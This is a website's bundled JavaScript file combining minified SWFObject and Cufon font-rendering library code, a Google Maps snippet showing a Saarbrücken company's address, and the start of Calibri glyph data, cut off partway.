j=a.pv,i=k.split(".");i[0]=parseInt(i[0],10);i[1]=parseInt(i[1],10);i[2]=parseInt(i[2],10);return(j[0]>i[0]||(j[0]==i[0]&&j[1]>i[1])||(j[0]==i[0]&&j[1]==i[1]&&j[2]>=i[2]))?true:false}function A(m,j){if(a.ie&&a.mac){return }var l=g.getElementsByTagName("head")[0],k=Y("style");k.setAttribute("type","text/css");k.setAttribute("media","screen");if(!(a.ie&&a.win)&&typeof g.createTextNode!=Z){k.appendChild(g.createTextNode(m+" {"+j+"}"))}l.appendChild(k);if(a.ie&&a.win&&typeof g.styleSheets!=Z&&g.styleSheets.length>0){var i=g.styleSheets[g.styleSheets.length-1];if(typeof i.addRule==P){i.addRule(m,j)}}}function X(k,i){var j=i?"visible":"hidden";if(S){c(k).style.visibility=j}else{A("#"+k,"visibility:"+j)}}return{registerObject:function(l,i,k){if(!a.w3cdom||!l||!i){return }var j={};j.id=l;j.swfVersion=i;j.expressInstall=k?k:false;H[H.length]=j;X(l,false)},getObjectById:function(l){var i=null;if(a.w3cdom&&S){var j=c(l);if(j){var k=j.getElementsByTagName(P)[0];if(!k||(k&&typeof j.SetVariable!=Z)){i=j}else{if(typeof k.SetVariable!=Z){i=k}}}}return i},embedSWF:function(n,u,r,t,j,m,k,p,s){if(!a.w3cdom||!n||!u||!r||!t||!j){return }r+="";t+="";if(O(j)){X(u,false);var q=(typeof s==P)?s:{};q.data=n;q.width=r;q.height=t;var o=(typeof p==P)?p:{};if(typeof k==P){for(var l in k){if(k[l]!=Object.prototype[l]){if(typeof o.flashvars!=Z){o.flashvars+="&"+l+"="+k[l]}else{o.flashvars=l+"="+k[l]}}}}J(function(){R(q,o,u);if(q.id==u){X(u,true)}})}else{if(m&&!C&&O("6.0.65")&&(a.win||a.mac)){X(u,false);J(function(){var i={};i.id=i.altContentId=u;i.width=r;i.height=t;i.expressInstall=m;D(i)})}}},getFlashPlayerVersion:function(){return{major:a.pv[0],minor:a.pv[1],release:a.pv[2]}},hasFlashPlayerVersion:O,createSWF:function(k,j,i){if(a.w3cdom&&S){return R(k,j,i)}else{return undefined}},createCSS:function(j,i){if(a.w3cdom){A(j,i)}},addDomLoadEvent:J,addLoadEvent:M,getQueryParamValue:function(m){var l=g.location.search||g.location.hash;if(m==null){return l}if(l){var k=l.substring(1).split("&");for(var j=0;j<k.length;j++){if(k[j].substring(0,k[j].indexOf("="))==m){return k[j].substring((k[j].indexOf("=")+1))}}}return""},expressInstallCallback:function(){if(C&&L){var i=c(K);if(i){i.parentNode.replaceChild(L,i);if(T){X(T,true);if(a.ie&&a.win){L.style.display="block"}}L=null;T=null;C=false}}}}}();

function load() {
	if (GBrowserIsCompatible()) {
		var map = new GMap2(document.getElementById("map"));
		map.addControl(new GSmallMapControl());
		var point = new GLatLng(49.24047, 7.006444);
		map.setCenter(point, 13);
		var marker = new GMarker(point);
		map.addOverlay(marker);
		var point = new GPoint(49.24047, 7.006444);
		
		infotext = "<img src=\"pics/logo_netmedia.gif\" style=\"float: left; margin: 8px 8px 0 0\" />";
		infotext += "<div style=\"color: #2e2e2e; padding-top: 8px\">";
		infotext += "<strong>netmedianer GmbH</strong>";
		infotext += "<br/>Neugrabenweg 5-7, D-66123 Saarbr&uuml;cken";
		infotext += "<br/>Fon: +49-681-37988-0";
		infotext += "<br/>Fax: +49-681-37988-99";
		infotext += "</div>";
		
        // marker.openInfoWindowHtml(infotext);
		GEvent.addListener(marker, "click", function() {
        	marker.openInfoWindowHtml(infotext);
		});

	}
}


/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.01
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textDecoration:function(G,F){if(!F){F=this.getStyle(G)}var C={underline:null,overline:null,"line-through":null};for(var B=G;B.parentNode&&B.parentNode.nodeType==1;){var E=true;for(var D in C){if(!k(C,D)||C[D]){continue}if(F.get("textDecoration").indexOf(D)!=-1){C[D]=F.get("color")}E=false}if(E){break}F=this.getStyle(B=B.parentNode)}return C},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var B={inline:1,"inline-block":1,"run-in":1};return function(E,C,D){if(B[C.get("display")]){return E}if(!D.previousSibling){E=E.replace(/^\s+/,"")}if(!D.nextSibling){E=E.replace(/\s+$/,"")}return E}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(C){var B=this.face=C.face;this.glyphs=C.glyphs;this.w=C.w;this.baseSize=parseInt(B["units-per-em"],10);this.family=B["font-family"].toLowerCase();this.weight=B["font-weight"];this.style=B["font-style"]||"normal";this.viewBox=(function(){var E=B.bbox.split(/\s+/);var D={minX:parseInt(E[0],10),minY:parseInt(E[1],10),maxX:parseInt(E[2],10),maxY:parseInt(E[3],10)};D.width=D.maxX-D.minX;D.height=D.maxY-D.minY;D.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return D})();this.ascent=-parseInt(B.ascent,10);this.descent=-parseInt(B.descent,10);this.height=-this.ascent+this.descent}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>I&&L>I)?M<L:M>L:(M<I&&L<I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this)}function E(F){C(this)}function C(F){setTimeout(function(){m.replace(F,d.get(F).options,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var B={},D,F;for(var E=0,C=arguments.length;D=arguments[E],E<C;++E){for(F in D){if(k(D,F)){B[F]=D[F]}}}return B}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(C,J){var B=n.getStyle(v(C,J)).extend(J);var D=c(C,B),E,H,G,F,I;for(E=C.firstChild;E;E=G){H=E.nodeType;G=E.nextSibling;if(H==3){if(F){F.appendData(E.data);C.removeChild(E)}else{F=E}if(G){continue}}if(F){C.replaceChild(o(D,n.whiteSpace(F.data,B,E),B,J,E,C),F);F=null}if(H==1&&E.firstChild){if(/cufon/.test(E.className)){z[J.engine](D,null,B,J,E,C)}else{arguments.callee(E,J)}}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={enableTextDecoration:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||(window.Ext&&Ext.query)||g),separate:"words",textShadow:"none"};var p={words:/[^\S\u00a0]+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.removeClass(x.root(),"cufon-loading")});e=true}if(C.hover){C.forceHitArea=true}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode((".cufon-canvas{text-indent:0;}@media screen,projection{.cufon-canvas{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}.cufon-canvas .cufon-alt{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?".cufon-canvas canvas{position:relative;}":".cufon-canvas canvas{position:absolute;}")+"}@media print{.cufon-canvas{padding:0;}.cufon-canvas canvas{display:none;}.cufon-canvas .cufon-alt{display:inline;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(ah,H,Z,D,L,ai){var n=(H===null);if(n){H=L.alt}var J=ah.viewBox;var p=Z.getSize("fontSize",ah.baseSize);var X=Z.get("letterSpacing");X=(X=="normal")?0:p.convertFrom(parseInt(X,10));var K=0,Y=0,W=0,F=0;var I=D.textShadow,U=[];if(I){for(var ag=I.length;ag--;){var O=I[ag];var T=p.convertFrom(parseFloat(O.offX));var R=p.convertFrom(parseFloat(O.offY));U[ag]=[T,R];if(R<K){K=R}if(T>Y){Y=T}if(R>W){W=R}if(T<F){F=T}}}var al=Cufon.CSS.textTransform(H,Z).split(""),B;var o=ah.glyphs,E,r,ac;var h=0,v,N=[];for(var ag=0,ae=0,ab=al.length;ag<ab;++ag){E=o[B=al[ag]]||ah.missingGlyph;if(!E){continue}if(r){h-=ac=r[B]||0;N[ae-1]-=ac}h+=v=N[ae++]=~~(E.w||ah.w)+X;r=E.k}if(v===undefined){return null}Y+=J.width-v;F+=J.minX;var C,q;if(n){C=L;q=L.firstChild}else{C=document.createElement("span");C.className="cufon cufon-canvas";C.alt=H;q=document.createElement("canvas");C.appendChild(q);if(D.printable){var ad=document.createElement("span");ad.className="cufon-alt";ad.appendChild(document.createTextNode(H));C.appendChild(ad)}}var am=C.style;var Q=q.style;var m=p.convert(J.height);var ak=Math.ceil(m);var V=ak/m;var P=V*Cufon.CSS.fontStretch(Z.get("fontStretch"));var S=h*P;var aa=Math.ceil(p.convert(S+Y-F));var t=Math.ceil(p.convert(J.height-K+W));q.width=aa;q.height=t;Q.width=aa+"px";Q.height=t+"px";K+=J.minY;Q.top=Math.round(p.convert(K-ah.ascent))+"px";Q.left=Math.round(p.convert(F))+"px";var A=Math.ceil(p.convert(S))+"px";if(a){am.width=A;am.height=p.convert(ah.height)+"px"}else{am.paddingLeft=A;am.paddingBottom=(p.convert(ah.height)-1)+"px"}var aj=q.getContext("2d"),M=m/J.height;aj.scale(M,M*V);aj.translate(-F,-K);aj.lineWidth=ah.face["underline-thickness"];aj.save();function s(i,g){aj.strokeStyle=g;aj.beginPath();aj.moveTo(0,i);aj.lineTo(h,i);aj.stroke()}var u=D.enableTextDecoration?Cufon.CSS.textDecoration(ai,Z):{};if(u.underline){s(-ah.face["underline-position"],u.underline)}if(u.overline){s(ah.ascent,u.overline)}function af(){aj.scale(P,1);for(var x=0,k=0,g=al.length;x<g;++x){var y=o[al[x]]||ah.missingGlyph;if(!y){continue}if(y.d){aj.beginPath();if(y.code){c(y.code,aj)}else{y.code=d("m"+y.d,aj)}aj.fill()}aj.translate(N[k++],0)}aj.restore()}if(I){for(var ag=I.length;ag--;){var O=I[ag];aj.save();aj.fillStyle=O.color;aj.translate.apply(aj,U[ag]);af()}}var z=D.textGradient;if(z){var G=z.stops,w=aj.createLinearGradient(0,J.minY,0,J.maxY);for(var ag=0,ab=G.length;ag<ab;++ag){w.addColorStop.apply(w,G[ag])}aj.fillStyle=w}else{aj.fillStyle=Z.get("color")}af();if(u["line-through"]){s(-ah.descent,u["line-through"])}return C}})());Cufon.registerEngine("vml",(function(){if(!document.namespaces){return}if(document.namespaces.cvml==null){document.namespaces.add("cvml","urn:schemas-microsoft-com:vml")}var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var f=(document.documentMode||0)<8;document.write(('<style type="text/css">.cufon-vml-canvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}.cufon-vml-canvas{position:absolute;text-align:left;}.cufon-vml{display:inline-block;position:relative;vertical-align:'+(f?"middle":"text-bottom")+";}.cufon-vml .cufon-alt{position:absolute;left:-10000in;font-size:1px;}a .cufon-vml{cursor:pointer}}@media print{.cufon-vml *{display:none;}.cufon-vml .cufon-alt{display:inline;}}</style>").replace(/;/g,"!important;"));function c(g,h){return a(g,/(?:em|ex|%)$|^[a-z-]+$/i.test(h)?"1em":h)}function a(j,k){if(/px$/i.test(k)){return parseFloat(k)}var i=j.style.left,h=j.runtimeStyle.left;j.runtimeStyle.left=j.currentStyle.left;j.style.left=k.replace("%","em");var g=j.style.pixelLeft;j.style.left=i;j.runtimeStyle.left=h;return g}var e={};function d(n){var o=n.id;if(!e[o]){var l=n.stops,m=document.createElement("cvml:fill"),g=[];m.type="gradient";m.angle=180;m.focus="0";m.method="sigma";m.color=l[0][1];for(var i=1,h=l.length-1;i<h;++i){g.push(l[i][0]*100+"% "+l[i][1])}m.colors=g.join(",");m.color2=l[h][1];e[o]=m}return e[o]}return function(ai,J,ac,F,N,aj,aa){var n=(J===null);if(n){J=N.alt}var L=ai.viewBox;var p=ac.computedFontSize||(ac.computedFontSize=new Cufon.CSS.Size(c(aj,ac.get("fontSize"))+"px",ai.baseSize));var Z=ac.computedLSpacing;if(Z==undefined){Z=ac.get("letterSpacing");ac.computedLSpacing=Z=(Z=="normal")?0:~~p.convertFrom(a(aj,Z))}var B,q;if(n){B=N;q=N.firstChild}else{B=document.createElement("span");B.className="cufon cufon-vml";B.alt=J;q=document.createElement("span");q.className="cufon-vml-canvas";B.appendChild(q);if(F.printable){var af=document.createElement("span");af.className="cufon-alt";af.appendChild(document.createTextNode(J));B.appendChild(af)}if(!aa){B.appendChild(document.createElement("cvml:shape"))}}var ao=B.style;var U=q.style;var h=p.convert(L.height),al=Math.ceil(h);var Y=al/h;var S=Y*Cufon.CSS.fontStretch(ac.get("fontStretch"));var X=L.minX,W=L.minY;U.height=al;U.top=Math.round(p.convert(W-ai.ascent));U.left=Math.round(p.convert(X));ao.height=p.convert(ai.height)+"px";var u=F.enableTextDecoration?Cufon.CSS.textDecoration(aj,ac):{};var I=ac.get("color");var an=Cufon.CSS.textTransform(J,ac).split(""),A;var o=ai.glyphs,G,r,ae;var g=0,O=[],V=0,w;var y,K=F.textShadow;for(var ah=0,ag=0,ad=an.length;ah<ad;++ah){G=o[A=an[ah]]||ai.missingGlyph;if(!G){continue}if(r){g-=ae=r[A]||0;O[ag-1]-=ae}g+=w=O[ag++]=~~(G.w||ai.w)+Z;r=G.k}if(w===undefined){return null}var z=-X+g+(L.width-w);var am=p.convert(z*S),ab=Math.round(am);var R=z+","+L.height,m;var M="r"+R+"ns";var x=F.textGradient&&d(F.textGradient);for(ah=0,ag=0;ah<ad;++ah){G=o[an[ah]]||ai.missingGlyph;if(!G){continue}if(n){y=q.childNodes[ag];while(y.firstChild){y.removeChild(y.firstChild)}}else{y=document.createElement("cvml:shape");q.appendChild(y)}y.stroked="f";y.coordsize=R;y.coordorigin=m=(X-V)+","+W;y.path=(G.d?"m"+G.d+"xe":"")+"m"+m+M;y.fillcolor=I;if(x){y.appendChild(x.cloneNode(false))}var ak=y.style;ak.width=ab;ak.height=al;if(K){var t=K[0],s=K[1];var E=Cufon.CSS.color(t.color),C;var Q=document.createElement("cvml:shadow");Q.on="t";Q.color=E.color;Q.offset=t.offX+","+t.offY;if(s){C=Cufon.CSS.color(s.color);Q.type="double";Q.color2=C.color;Q.offset2=s.offX+","+s.offY}Q.opacity=E.opacity||(C&&C.opacity)||1;y.appendChild(Q)}V+=O[ag++]}var P=y.nextSibling,v,D;if(F.forceHitArea){if(!P){P=document.createElement("cvml:rect");P.stroked="f";P.className="cufon-vml-cover";v=document.createElement("cvml:fill");v.opacity=0;P.appendChild(v);q.appendChild(P)}D=P.style;D.width=ab;D.height=al}else{if(P){q.removeChild(P)}}ao.width=Math.max(Math.ceil(p.convert(g*S)),0);if(f){var T=ac.computedYAdjust;if(T===undefined){var H=ac.get("lineHeight");if(H=="normal"){H="1em"}else{if(!isNaN(H)){H+="em"}}ac.computedYAdjust=T=0.5*(a(aj,H)-parseFloat(ao.height))}if(T){ao.marginTop=Math.ceil(T)+"px";ao.marginBottom=T+"px"}}return B}})());

/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * © 2006 Microsoft Corporation. All Rights Reserved.
 * 
 * Trademark:
 * Calibri is either a registered trademark or a trademark of Microsoft
 * Corporation in the United States and/or other countries.
 * 
 * Description:
 * Calibri is a modern sans serif family with subtle roundings on stems and
 * corners. It features real italics, small caps, and multiple numeral sets. Its
 * proportions allow high impact in tightly set lines of big and small text alike.
 * Calibri's many curves and the new rasteriser team up in bigger sizes to reveal a
 * warm and soft character.
 * 
 * Manufacturer:
 * Microsoft Corporation
 * 
 * Designer:
 * Luc(as) de Groot
 * 
 * Vendor URL:
 * http://www.microsoft.com/typography/ctfonts
 * 
 * License information:
 * http://www.microsoft.com/typography/fonts/default.aspx
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"118,-279v-5,7,-26,11,-31,2v20,-19,27,-50,63,-53v9,-1,18,4,12,10xm153,-247v3,-12,46,-10,33,6r-72,143v-2,32,4,72,-3,98v-11,-1,-29,5,-31,-5r0,-93r-74,-150v0,-11,33,-8,37,1r55,117v17,-41,36,-79,55,-117","w":194,"k":{"-":23,"\/":24,".":46,":":30,";":27,",":49,"z":20,"\u00ff":13,"\u00fd":13,"y":13,"x":14,"w":12,"v":13,"\u00fc":18,"\u00fb":18,"\u00fa":18,"\u00f9":18,"u":18,"t":9,"\u00df":14,"s":22,"r":18,"q":26,"p":18,"\u00f8":30,"\u00f6":30,"\u00f5":30,"\u00f4":30,"\u00f3":30,"\u00f2":30,"o":30,"\u00f1":18,"n":18,"m":18,"j":10,"\u00ef":-10,"\u00ee":-9,"\u00ed":14,"\u00ec":-8,"i":6,"g":28,"f":12,"\u00eb":29,"\u00ea":29,"\u00e9":29,"\u00e8":29,"e":29,"d":26,"\u00e7":31,"c":31,"\u00e6":26,"\u00e5":26,"\u00e4":26,"\u00e3":26,"\u00e2":26,"\u00e1":26,"\u00e0":26,"a":26,"Z":2,"S":3,"Q":13,"\u00d6":13,"\u00d5":13,"\u00d4":13,"\u00d3":13,"\u00d2":13,"O":13,"J":22,"G":13,"\u00c7":13,"C":13,"\u00c6":34,"\u00c5":30,"\u00c4":30,"\u00c3":30,"\u00c2":30,"\u00c1":30,"\u00c0":30,"A":30}},{"d":"151,-46v8,0,6,21,3,27v-11,14,-34,23,-58,23v-55,0,-78,-38,-78,-95v0,-60,25,-98,82,-98v28,0,54,6,55,34v0,8,0,14,-6,14v-14,-8,-26,-22,-50,-21v-35,1,-48,31,-48,70v1,38,11,68,49,68v23,0,36,-15,51,-22","w":169,"k":{"\u00f8":3,"\u00f6":3,"\u00f5":3,"\u00f4":3,"\u00f3":3,"\u00f2":3,"o":3,"\u00e6":3,"\u00e5":3,"\u00e4":3,"\u00e3":3,"\u00e2":3,"\u00e1":3,"\u00e0":3,"a":3}},{"d":"64,-317v14,0,19,4,19,18v0,14,-5,19,-19,20v-14,0,-19,-5,-19,-19v0,-14,5,-19,19,-19xm145,-317v14,0,19,4,19,18v0,14,-5,19,-19,20v-14,0,-19,-5,-19,-19v0,-14,5,-19,19,-19xm167,-28v10,0,10,27,0,28r-121,0v-7,0,-13,-5,-12,-14r0,-225v-1,-9,5,-14,12,-14r120,0v10,2,10,28,0,28r-99,0r0,79r85,0v10,2,10,27,0,28r-85,0r0,90r100,0","w":195,"k":{"-":5,"\u00ff":9,"\u00fd":9,"y":9,"w":7,"v":9,"t":5,"q":6,"\u00f8":7,"\u00f6":7,"\u00f5":7,"\u00f4":7,"\u00f3":7,"\u00f2":7,"o":7,"f":12,"\u00eb":7,"\u00ea":7,"\u00e9":7,"\u00e8":7,"e":7,"d":6,"\u00e7":5,"c":5,"\u00e6":7,"\u00e5":7,"\u00e4":7,"\u00e3":7,"\u00e2":7,"\u00e1":7,"\u00e0":7,"a":7,"Z":2,"S":4,"Q":6,"\u00d6":6,"\u00d5":6,"\u00d4":6,"\u00d3":6,"\u00d2":6,"O":6,"G":5,"\u00c7":5,"C":5,"\u00c5":4,"\u00c4":4,"\u00c3":4,"\u00c2":4,"\u00c1":4,"\u00c0":4,"A":4}},{"d":"173,-29v10,1,11,28,0,29r-144,-1v-12,-4,-7,-29,1,-35v35,-48,95,-75,101,-149v4,-57,-72,-43,-98,-21v-8,2,-6,-12,-6,-20v9,-22,39,-28,69,-30v84,-7,87,99,42,146v-21,23,-51,57,-75,81r110,0","w":202},{"d":"113,-155v51,0,74,26,74,73v0,53,-31,86,-86,86v-67,0,-80,-54,-80,-121v1,-79,25,-139,105,-139v24,0,54,-3,48,32v-16,7,-55,-15,-81,2v-25,16,-37,45,-39,83v16,-8,34,-16,59,-16xm104,-23v32,0,46,-24,49,-56v6,-59,-67,-57,-98,-33v0,48,5,89,49,89","w":202},{"d":"102,-112v10,1,10,27,0,27r-81,0v-7,0,-8,-6,-8,-14v0,-8,2,-12,8,-13r81,0","w":122},{"d":"158,-248v3,-11,47,-8,31,7r-71,121r0,11r54,0v5,0,5,5,6,11v-1,7,0,12,-6,12r-54,0r0,31r54,0v8,1,8,24,0,24r-54,0v3,21,1,41,-30,31v-7,-2,-1,-21,-3,-31r-54,0v-8,-1,-8,-24,0,-24r54,0r0,-31r-54,0v-6,0,-5,-5,-6,-12v0,-6,1,-11,6,-11r54,0r0,-11r-74,-128v0,-10,32,-8,36,0r56,103","w":202},{"d":"2,-281v4,-8,31,-8,33,1r119,329v-2,8,-29,6,-32,-1","w":154},{"d":"64,-279v-3,8,-28,10,-30,2v19,-19,27,-50,62,-53v9,-1,20,4,13,10xm34,-248v1,-8,30,-8,33,0r0,243v-1,10,-20,6,-30,5v-2,0,-4,-3,-3,-5r0,-243","w":100},{"d":"65,-324v37,-22,60,27,77,47v-2,9,-27,5,-30,-2xm190,-248v4,-9,30,-8,34,0r0,155v-1,63,-36,97,-98,97v-61,0,-93,-35,-93,-95r0,-157v4,-8,30,-8,34,0v9,86,-33,223,62,223v95,0,51,-138,61,-223","w":256,"k":{".":7,",":5,"J":8,"\u00c6":7,"\u00c5":9,"\u00c4":9,"\u00c3":9,"\u00c2":9,"\u00c1":9,"\u00c0":9,"A":9}},{"d":"121,-189v53,1,71,41,71,94v0,56,-21,99,-76,99v-26,0,-40,-12,-54,-27r0,88v0,9,-32,